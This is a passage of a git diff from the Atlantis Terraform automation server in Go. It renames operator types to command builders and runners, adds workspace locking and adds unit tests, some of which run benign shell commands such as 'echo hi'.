mocks/mock_project_command_builder.go ProjectCommandBuilder -type PullRequestOperator interface { - Autoplan(ctx *CommandContext) CommandResponse - PlanViaComment(ctx *CommandContext) CommandResponse - ApplyViaComment(ctx *CommandContext) CommandResponse +type ProjectCommandBuilder interface { + BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) + BuildPlanCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error) + BuildApplyCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error) } -type DefaultPullRequestOperator struct { - TerraformExecutor TerraformExec - DefaultTFVersion *version.Version - ParserValidator *yaml.ParserValidator - ProjectFinder ProjectFinder - VCSClient vcs.ClientProxy - Workspace AtlantisWorkspace - ProjectOperator ProjectOperator +type DefaultProjectCommandBuilder struct { + ParserValidator *yaml.ParserValidator + ProjectFinder ProjectFinder + VCSClient vcs.ClientProxy + Workspace AtlantisWorkspace + AtlantisWorkspaceLocker AtlantisWorkspaceLocker } type TerraformExec interface { RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) } -func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { - // check out repo to parse atlantis.yaml - // this will check out the repo to a * dir - repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) +func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) { + // Need to lock the workspace we're about to clone to. 
+ workspace := DefaultWorkspace + unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num) if err != nil { - return CommandResponse{Error: err} + return nil, err + } + defer unlockFn() + + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, workspace) + if err != nil { + return nil, err } // Parse config file if it exists. ctx.Log.Debug("parsing config file") config, err := p.ParserValidator.ReadConfig(repoDir) if err != nil && !os.IsNotExist(err) { - return CommandResponse{Error: err} + return nil, err } noAtlantisYAML := os.IsNotExist(err) if noAtlantisYAML { @@ -61,11 +65,11 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon // We'll need the list of modified files. modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) if err != nil { - return CommandResponse{Error: err} + return nil, err } ctx.Log.Debug("%d files were modified in this pull request", len(modifiedFiles)) - // Prepare the project contexts so the ProjectOperator can execute. + // Prepare the project contexts so the ProjectCommandRunner can execute. var projCtxs []models.ProjectCommandContext // If there is no config file, then we try to plan for each project that @@ -93,7 +97,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon // in the config file. 
matchingProjects, err := p.matchingProjects(ctx.Log, modifiedFiles, config) if err != nil { - return CommandResponse{Error: err} + return nil, err } ctx.Log.Info("%d projects are to be autoplanned based on their when_modified config", len(matchingProjects)) @@ -120,22 +124,21 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon }) } } + return projCtxs, nil +} + +func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) { + var projCtx models.ProjectCommandContext - // Execute the operations. - var results []ProjectResult - for _, pCtx := range projCtxs { - res := p.ProjectOperator.Plan(pCtx, nil) - res.Path = pCtx.RepoRelPath - res.Workspace = pCtx.Workspace - results = append(results, res) + unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num) + if err != nil { + return projCtx, err } - return CommandResponse{ProjectResults: results} -} + defer unlockFn() -func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse { - repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, cmd.Workspace) if err != nil { - return CommandResponse{Error: err} + return projCtx, err } var projCfg *valid.Project @@ -144,55 +147,49 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command // Parse config file if it exists. config, err := p.ParserValidator.ReadConfig(repoDir) if err != nil && !os.IsNotExist(err) { - return CommandResponse{Error: err} + return projCtx, err } hasAtlantisYAML := !os.IsNotExist(err) if hasAtlantisYAML { // If they've specified a project by name we look it up. Otherwise we // use the dir and workspace. 
- if ctx.Command.ProjectName != "" { - projCfg = config.FindProjectByName(ctx.Command.ProjectName) + if cmd.ProjectName != "" { + projCfg = config.FindProjectByName(cmd.ProjectName) if projCfg == nil { - return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)} + return projCtx, fmt.Errorf("no project with name %q configured", cmd.ProjectName) } } else { - projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + projCfg = config.FindProject(cmd.Dir, cmd.Workspace) } globalCfg = &config } - if ctx.Command.ProjectName != "" && !hasAtlantisYAML { - return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)} + if cmd.ProjectName != "" && !hasAtlantisYAML { + return projCtx, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename) } - projCtx := models.ProjectCommandContext{ + projCtx = models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, Pull: ctx.Pull, User: ctx.User, Log: ctx.Log, - CommentArgs: ctx.Command.Flags, - Workspace: ctx.Command.Workspace, - RepoRelPath: ctx.Command.Dir, - ProjectName: ctx.Command.ProjectName, + CommentArgs: cmd.Flags, + Workspace: cmd.Workspace, + RepoRelPath: cmd.Dir, + ProjectName: cmd.ProjectName, ProjectConfig: projCfg, GlobalConfig: globalCfg, } - projAbsPath := filepath.Join(repoDir, ctx.Command.Dir) - res := p.ProjectOperator.Plan(projCtx, &projAbsPath) - res.Workspace = projCtx.Workspace - res.Path = projCtx.RepoRelPath - return CommandResponse{ - ProjectResults: []ProjectResult{ - res, - }, - } + return projCtx, nil } -func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse { - repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) +func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cmd *CommentCommand) 
(models.ProjectCommandContext, error) { + var projCtx models.ProjectCommandContext + + repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, cmd.Workspace) if err != nil { - return CommandResponse{Failure: "No workspace found. Did you run plan?"} + return projCtx, err } // todo: can deduplicate this between PlanViaComment @@ -202,53 +199,46 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman // Parse config file if it exists. config, err := p.ParserValidator.ReadConfig(repoDir) if err != nil && !os.IsNotExist(err) { - return CommandResponse{Error: err} + return projCtx, err } hasAtlantisYAML := !os.IsNotExist(err) if hasAtlantisYAML { // If they've specified a project by name we look it up. Otherwise we // use the dir and workspace. - if ctx.Command.ProjectName != "" { - projCfg = config.FindProjectByName(ctx.Command.ProjectName) + if cmd.ProjectName != "" { + projCfg = config.FindProjectByName(cmd.ProjectName) if projCfg == nil { - return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)} + return projCtx, fmt.Errorf("no project with name %q configured", cmd.ProjectName) } } else { - projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + projCfg = config.FindProject(cmd.Dir, cmd.Workspace) } globalCfg = &config } - if ctx.Command.ProjectName != "" && !hasAtlantisYAML { - return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)} + if cmd.ProjectName != "" && !hasAtlantisYAML { + return projCtx, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename) } - projCtx := models.ProjectCommandContext{ + projCtx = models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, Pull: ctx.Pull, User: ctx.User, Log: ctx.Log, - CommentArgs: ctx.Command.Flags, - Workspace: ctx.Command.Workspace, - RepoRelPath: 
ctx.Command.Dir, - ProjectName: ctx.Command.ProjectName, + CommentArgs: cmd.Flags, + Workspace: cmd.Workspace, + RepoRelPath: cmd.Dir, + ProjectName: cmd.ProjectName, ProjectConfig: projCfg, GlobalConfig: globalCfg, } - res := p.ProjectOperator.Apply(projCtx, filepath.Join(repoDir, ctx.Command.Dir)) - res.Workspace = projCtx.Workspace - res.Path = projCtx.RepoRelPath - return CommandResponse{ - ProjectResults: []ProjectResult{ - res, - }, - } + return projCtx, nil } // matchingProjects returns the list of projects whose WhenModified fields match // any of the modifiedFiles. -func (p *DefaultPullRequestOperator) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) { +func (p *DefaultProjectCommandBuilder) matchingProjects(log *logging.SimpleLogger, modifiedFiles []string, config valid.Spec) ([]valid.Project, error) { var projects []valid.Project for _, project := range config.Projects { log.Debug("checking if project at dir %q workspace %q was modified", project.Dir, project.Workspace) diff --git a/server/events/pull_request_operator_test.go b/server/events/project_command_builder_test.go similarity index 100% rename from server/events/pull_request_operator_test.go rename to server/events/project_command_builder_test.go diff --git a/server/events/project_operator.go b/server/events/project_command_runner.go similarity index 57% rename from server/events/project_operator.go rename to server/events/project_command_runner.go index b5e8184ec3..0db221defe 100644 --- a/server/events/project_operator.go +++ b/server/events/project_command_runner.go @@ -14,6 +14,7 @@ package events import ( + "os" "path/filepath" "strings" @@ -41,46 +42,48 @@ type PlanSuccess struct { LockURL string } -type ProjectOperator struct { - Locker ProjectLocker - LockURLGenerator LockURLGenerator - InitStepOperator runtime.InitStepOperator - PlanStepOperator runtime.PlanStepOperator - ApplyStepOperator runtime.ApplyStepOperator - 
RunStepOperator runtime.RunStepOperator - ApprovalOperator runtime.ApprovalOperator - Workspace AtlantisWorkspace - Webhooks WebhooksSender +type ProjectCommandRunner struct { + Locker ProjectLocker + LockURLGenerator LockURLGenerator + InitStepRunner runtime.InitStepRunner + PlanStepRunner runtime.PlanStepRunner + ApplyStepRunner runtime.ApplyStepRunner + RunStepRunner runtime.RunStepRunner + PullApprovedChecker runtime.PullApprovedChecker + Workspace AtlantisWorkspace + Webhooks WebhooksSender + AtlantisWorkspaceLocker AtlantisWorkspaceLocker } -func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult { +func (p *ProjectCommandRunner) Plan(ctx models.ProjectCommandContext) ProjectCommandResult { // Acquire Atlantis lock for this repo/dir/workspace. lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelPath)) if err != nil { - return ProjectResult{Error: errors.Wrap(err, "acquiring lock")} + return ProjectCommandResult{ + Error: errors.Wrap(err, "acquiring lock"), + } } if !lockAttempt.LockAcquired { - return ProjectResult{Failure: lockAttempt.LockFailureReason} + return ProjectCommandResult{Failure: lockAttempt.LockFailureReason} } ctx.Log.Debug("acquired lock for project") - // Ensure project has been cloned. - var projAbsPath string - if projAbsPathPtr == nil { - ctx.Log.Debug("project has not yet been cloned") - repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) - if cloneErr != nil { - if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { - ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) - } - return ProjectResult{Error: cloneErr} + // Acquire internal lock for the directory we're going to operate in. 
+ unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num) + if err != nil { + return ProjectCommandResult{Error: err} + } + defer unlockFn() + + // Clone is idempotent so okay to run even if the repo was already cloned. + repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) + if cloneErr != nil { + if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { + ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) } - projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath) - ctx.Log.Debug("project successfully cloned to %q", projAbsPath) - } else { - projAbsPath = *projAbsPathPtr - ctx.Log.Debug("project was already cloned to %q", projAbsPath) + return ProjectCommandResult{Error: cloneErr} } + projAbsPath := filepath.Join(repoDir, ctx.RepoRelPath) // Use default stage unless another workflow is defined in config stage := p.defaultPlanStage() @@ -98,10 +101,10 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) } // todo: include output from other steps. 
- return ProjectResult{Error: err} + return ProjectCommandResult{Error: err} } - return ProjectResult{ + return ProjectCommandResult{ PlanSuccess: &PlanSuccess{ LockURL: p.LockURLGenerator.GenerateLockURL(lockAttempt.LockKey), TerraformOutput: strings.Join(outputs, "\n"), @@ -109,20 +112,20 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr } } -func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) { +func (p *ProjectCommandRunner) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) { var outputs []string for _, step := range steps { var out string var err error switch step.StepName { case "init": - out, err = p.InitStepOperator.Run(ctx, step.ExtraArgs, absPath) + out, err = p.InitStepRunner.Run(ctx, step.ExtraArgs, absPath) case "plan": - out, err = p.PlanStepOperator.Run(ctx, step.ExtraArgs, absPath) + out, err = p.PlanStepRunner.Run(ctx, step.ExtraArgs, absPath) case "apply": - out, err = p.ApplyStepOperator.Run(ctx, step.ExtraArgs, absPath) + out, err = p.ApplyStepRunner.Run(ctx, step.ExtraArgs, absPath) case "run": - out, err = p.RunStepOperator.Run(ctx, step.RunCommand, absPath) + out, err = p.RunStepRunner.Run(ctx, step.RunCommand, absPath) } if err != nil { @@ -136,21 +139,36 @@ func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommand return outputs, nil } -func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string) ProjectResult { +func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCommandResult { + repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Workspace) + if err != nil { + if os.IsNotExist(err) { + return ProjectCommandResult{Error: errors.New("project has not been cloned–did you run plan?")} + } + return ProjectCommandResult{Error: err} + } + absPath := filepath.Join(repoDir, ctx.RepoRelPath) + if ctx.ProjectConfig 
!= nil { for _, req := range ctx.ProjectConfig.ApplyRequirements { switch req { case "approved": - approved, err := p.ApprovalOperator.IsApproved(ctx.BaseRepo, ctx.Pull) + approved, err := p.PullApprovedChecker.IsApproved(ctx.BaseRepo, ctx.Pull) if err != nil { - return ProjectResult{Error: errors.Wrap(err, "checking if pull request was approved")} + return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")} } if !approved { - return ProjectResult{Failure: "Pull request must be approved before running apply."} + return ProjectCommandResult{Failure: "Pull request must be approved before running apply."} } } } } + // Acquire internal lock for the directory we're going to operate in. + unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, ctx.Workspace, ctx.Pull.Num) + if err != nil { + return ProjectCommandResult{Error: err} + } + defer unlockFn() // Use default stage unless another workflow is defined in config stage := p.defaultApplyStage() @@ -170,14 +188,14 @@ func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string }) if err != nil { // todo: include output from other steps. 
- return ProjectResult{Error: err} + return ProjectCommandResult{Error: err} } - return ProjectResult{ + return ProjectCommandResult{ ApplySuccess: strings.Join(outputs, "\n"), } } -func (p ProjectOperator) defaultPlanStage() valid.Stage { +func (p ProjectCommandRunner) defaultPlanStage() valid.Stage { return valid.Stage{ Steps: []valid.Step{ { @@ -190,7 +208,7 @@ func (p ProjectOperator) defaultPlanStage() valid.Stage { } } -func (p ProjectOperator) defaultApplyStage() valid.Stage { +func (p ProjectCommandRunner) defaultApplyStage() valid.Stage { return valid.Stage{ Steps: []valid.Step{ { diff --git a/server/events/project_operator_test.go b/server/events/project_command_runner_test.go similarity index 100% rename from server/events/project_operator_test.go rename to server/events/project_command_runner_test.go diff --git a/server/events/project_result.go b/server/events/project_result.go index ca5a1ecee4..f01ccd9361 100644 --- a/server/events/project_result.go +++ b/server/events/project_result.go @@ -17,8 +17,12 @@ import "github.com/runatlantis/atlantis/server/events/vcs" // ProjectResult is the result of executing a plan/apply for a project. type ProjectResult struct { - Path string - Workspace string + ProjectCommandResult + Path string + Workspace string +} + +type ProjectCommandResult struct { Error error Failure string PlanSuccess *PlanSuccess diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_runner.go similarity index 83% rename from server/events/runtime/apply_step_operator.go rename to server/events/runtime/apply_step_runner.go index 7b4a58c80a..2cb3a50c1d 100644 --- a/server/events/runtime/apply_step_operator.go +++ b/server/events/runtime/apply_step_runner.go @@ -9,12 +9,12 @@ import ( "github.com/runatlantis/atlantis/server/events/models" ) -// ApplyStepOperator runs `terraform apply`. -type ApplyStepOperator struct { +// ApplyStepRunner runs `terraform apply`. 
+type ApplyStepRunner struct { TerraformExecutor TerraformExec } -func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { +func (a *ApplyStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { // todo: move this to a common library planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace) if ctx.ProjectName != "" { diff --git a/server/events/runtime/apply_step_operator_test.go b/server/events/runtime/apply_step_runner_test.go similarity index 95% rename from server/events/runtime/apply_step_operator_test.go rename to server/events/runtime/apply_step_runner_test.go index 1aad3c9e23..afc5c99e30 100644 --- a/server/events/runtime/apply_step_operator_test.go +++ b/server/events/runtime/apply_step_runner_test.go @@ -17,7 +17,7 @@ import ( ) func TestRun_NoDir(t *testing.T) { - o := runtime.ApplyStepOperator{ + o := runtime.ApplyStepRunner{ TerraformExecutor: nil, } _, err := o.Run(models.ProjectCommandContext{ @@ -30,7 +30,7 @@ func TestRun_NoDir(t *testing.T) { func TestRun_NoPlanFile(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - o := runtime.ApplyStepOperator{ + o := runtime.ApplyStepRunner{ TerraformExecutor: nil, } _, err := o.Run(models.ProjectCommandContext{ @@ -49,7 +49,7 @@ func TestRun_Success(t *testing.T) { RegisterMockTestingT(t) terraform := mocks.NewMockClient() - o := runtime.ApplyStepOperator{ + o := runtime.ApplyStepRunner{ TerraformExecutor: terraform, } @@ -74,7 +74,7 @@ func TestRun_UsesConfiguredTFVersion(t *testing.T) { RegisterMockTestingT(t) terraform := mocks.NewMockClient() - o := runtime.ApplyStepOperator{ + o := runtime.ApplyStepRunner{ TerraformExecutor: terraform, } tfVersion, _ := version.NewVersion("0.11.0") diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_runner.go similarity index 87% rename from server/events/runtime/init_step_operator.go rename to 
server/events/runtime/init_step_runner.go index f483ecbbd9..da8ae585ff 100644 --- a/server/events/runtime/init_step_operator.go +++ b/server/events/runtime/init_step_runner.go @@ -6,13 +6,13 @@ import ( ) // InitStep runs `terraform init`. -type InitStepOperator struct { +type InitStepRunner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version } // nolint: unparam -func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { +func (i *InitStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { tfVersion := i.DefaultTFVersion if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { tfVersion = ctx.ProjectConfig.TerraformVersion diff --git a/server/events/runtime/init_step_operator_test.go b/server/events/runtime/init_step_runner_test.go similarity index 97% rename from server/events/runtime/init_step_operator_test.go rename to server/events/runtime/init_step_runner_test.go index efbf4ca283..4a1416fbae 100644 --- a/server/events/runtime/init_step_operator_test.go +++ b/server/events/runtime/init_step_runner_test.go @@ -44,7 +44,7 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - iso := runtime.InitStepOperator{ + iso := runtime.InitStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } diff --git a/server/events/runtime/plan_step_operater.go b/server/events/runtime/plan_step_runner.go similarity index 93% rename from server/events/runtime/plan_step_operater.go rename to server/events/runtime/plan_step_runner.go index 30028dd487..f0e49b6ed7 100644 --- a/server/events/runtime/plan_step_operater.go +++ b/server/events/runtime/plan_step_runner.go @@ -15,12 +15,12 @@ import ( const atlantisUserTFVar = "atlantis_user" const defaultWorkspace = "default" -type PlanStepOperator struct { +type PlanStepRunner struct { 
TerraformExecutor TerraformExec DefaultTFVersion *version.Version } -func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { +func (p *PlanStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { tfVersion := p.DefaultTFVersion if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { tfVersion = ctx.ProjectConfig.TerraformVersion @@ -55,7 +55,7 @@ func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []str // switchWorkspace changes the terraform workspace if necessary and will create // it if it doesn't exist. It handles differences between versions. -func (p *PlanStepOperator) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error { +func (p *PlanStepRunner) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error { // In versions less than 0.9 there is no support for workspaces. 
noWorkspaceSupport := MustConstraint("<0.9").Check(tfVersion) // If the user tried to set a specific workspace in the comment but their diff --git a/server/events/runtime/plan_step_operater_test.go b/server/events/runtime/plan_step_runner_test.go similarity index 87% rename from server/events/runtime/plan_step_operater_test.go rename to server/events/runtime/plan_step_runner_test.go index bf80927b6d..01dce930ba 100644 --- a/server/events/runtime/plan_step_operater_test.go +++ b/server/events/runtime/plan_step_runner_test.go @@ -26,7 +26,7 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ DefaultTFVersion: tfVersion, TerraformExecutor: terraform, } @@ -59,7 +59,7 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -107,7 +107,7 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -162,7 +162,7 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -201,7 +201,7 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: 
tfVersion, } @@ -243,7 +243,7 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := runtime.PlanStepOperator{ + s := runtime.PlanStepRunner{ TerraformExecutor: terraform, DefaultTFVersion: tfVersion, } @@ -265,3 +265,31 @@ func TestRun_AddsEnvVarFile(t *testing.T) { terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace") Equals(t, "output", output) } + +func TestRun_UsesDiffPathForProject(t *testing.T) { + // Test that if running for a project, uses a different path for the plan + // file. + RegisterMockTestingT(t) + terraform := mocks.NewMockClient() + tfVersion, _ := version.NewVersion("0.10.0") + logger := logging.NewNoopLogger() + s := runtime.PlanStepRunner{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, + } + When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil) + + expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/projectname-default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} + When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "default")).ThenReturn("output", nil) + + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "default", + RepoRelPath: ".", + ProjectName: "projectname", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, "/path") + Ok(t, err) + Equals(t, "output", output) +} diff --git a/server/events/runtime/approval_operator.go b/server/events/runtime/pull_approved_checker.go similarity index 67% rename from server/events/runtime/approval_operator.go rename to server/events/runtime/pull_approved_checker.go index 63731f3427..049f434969 100644 --- 
a/server/events/runtime/approval_operator.go +++ b/server/events/runtime/pull_approved_checker.go @@ -5,11 +5,11 @@ import ( "github.com/runatlantis/atlantis/server/events/vcs" ) -type ApprovalOperator struct { +type PullApprovedChecker struct { VCSClient vcs.ClientProxy } -func (a *ApprovalOperator) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) { +func (a *PullApprovedChecker) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) { approved, err := a.VCSClient.PullIsApproved(baseRepo, pull) if err != nil { return false, err diff --git a/server/events/runtime/run_step_operator_test.go b/server/events/runtime/run_step_operator_test.go deleted file mode 100644 index 899327a695..0000000000 --- a/server/events/runtime/run_step_operator_test.go +++ /dev/null @@ -1,3 +0,0 @@ -package runtime_test - -// todo diff --git a/server/events/runtime/run_step_operator.go b/server/events/runtime/run_step_runner.go similarity index 77% rename from server/events/runtime/run_step_operator.go rename to server/events/runtime/run_step_runner.go index 6554527be6..1b406737aa 100644 --- a/server/events/runtime/run_step_operator.go +++ b/server/events/runtime/run_step_runner.go @@ -9,11 +9,11 @@ import ( "github.com/runatlantis/atlantis/server/events/models" ) -// RunStepOperator runs custom commands. -type RunStepOperator struct { +// RunStepRunner runs custom commands. 
+type RunStepRunner struct { } -func (r *RunStepOperator) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) { +func (r *RunStepRunner) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) { if len(command) < 1 { return "", errors.New("no commands for run step") } diff --git a/server/events/runtime/run_step_runner_test.go b/server/events/runtime/run_step_runner_test.go new file mode 100644 index 0000000000..36262b235c --- /dev/null +++ b/server/events/runtime/run_step_runner_test.go @@ -0,0 +1,50 @@ +package runtime_test + +import ( + "strings" + "testing" + + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/runtime" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +func TestRunStepRunner_Run(t *testing.T) { + cases := []struct { + Command string + ExpOut string + ExpErr string + }{ + { + Command: "echo hi", + ExpOut: "hi\n", + }, + { + Command: "echo hi >> file && cat file", + ExpOut: "hi\n", + }, + { + Command: "lkjlkj", + ExpErr: "exit status 127: running \"lkjlkj\" in", + }, + } + + r := runtime.RunStepRunner{} + ctx := models.ProjectCommandContext{ + Log: logging.NewNoopLogger(), + } + for _, c := range cases { + t.Run(c.Command, func(t *testing.T) { + tmpDir, cleanup := TempDir(t) + defer cleanup() + out, err := r.Run(ctx, strings.Split(c.Command, " "), tmpDir) + if c.ExpErr != "" { + ErrContains(t, c.ExpErr, err) + return + } + Ok(t, err) + Equals(t, c.ExpOut, out) + }) + } +} diff --git a/server/events/vcs/fixtures/fixtures.go b/server/events/vcs/fixtures/fixtures.go index e3155f1992..6939162032 100644 --- a/server/events/vcs/fixtures/fixtures.go +++ b/server/events/vcs/fixtures/fixtures.go @@ -15,6 +15,14 @@ package fixtures import "github.com/google/go-github/github" +var PullEvent = github.PullRequestEvent{ + Sender: &github.User{ + Login: github.String("user"), + }, + Repo: &Repo, + 
